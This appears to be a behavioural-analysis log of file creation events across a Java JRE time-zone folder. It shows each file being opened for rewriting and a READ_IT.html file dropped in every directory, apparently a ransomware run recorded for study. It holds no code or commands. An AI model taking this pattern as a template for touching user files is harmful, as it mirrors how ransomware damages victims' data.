Create	C:\Program Files (x86)\Java\jre7\lib\jvm.hprof.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\logging.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management-agent.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\meta-index	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\net.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\plugin.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\psfont.properties.ja	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\psfontj2d.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\resources.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\rt.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\sound.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\tzmappings	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\CET	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\CST6CDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\EET	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\EST	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\EST5EDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\GMT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\HST	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\MET	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\MST	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\MST7MDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\PST8PDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\WET	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\ZoneInfoMappings	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\AST4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\AST4ADT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\CST6	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\CST6CDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\EST5	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\EST5EDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\HST10	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\MST7	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\MST7MDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\PST8	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\PST8PDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\YST9	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\SystemV\YST9YDT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Apia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Auckland	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Chatham	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Chuuk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Easter	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Efate	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Enderbury	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Fakaofo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Fiji	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Funafuti	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Galapagos	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Gambier	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Guadalcanal	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Guam	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Honolulu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Kiritimati	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Kosrae	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Kwajalein	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Majuro	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Marquesas	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Midway	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Nauru	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Niue	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Norfolk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Noumea	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Pago_Pago	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Palau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Pitcairn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Pohnpei	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Port_Moresby	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Rarotonga	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Saipan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Tahiti	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Tarawa	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Tongatapu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Wake	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Pacific\Wallis	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Antananarivo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Chagos	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Christmas	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Cocos	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Comoro	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Kerguelen	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Mahe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Maldives	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Mauritius	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Mayotte	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Indian\Reunion	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Amsterdam	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Andorra	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Athens	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Belgrade	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Berlin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Brussels	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Bucharest	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Budapest	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Chisinau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Copenhagen	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Dublin	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Gibraltar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Helsinki	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Istanbul	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Kaliningrad	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Kiev	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Lisbon	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\London	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Luxembourg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Madrid	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Malta	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Minsk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Monaco	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Moscow	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Oslo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Paris	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Prague	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Riga	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Rome	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Samara	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Simferopol	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Sofia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Stockholm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Tallinn	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Tirane	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Uzhgorod	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Vienna	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Vilnius	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Volgograd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Warsaw	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Zaporozhye	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Europe\Zurich	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+10	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+11	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+12	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+5	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+6	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+7	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+8	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT+9	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-10	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-11	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-12	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-13	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-14	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-5	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-6	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Etc\GMT-7	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
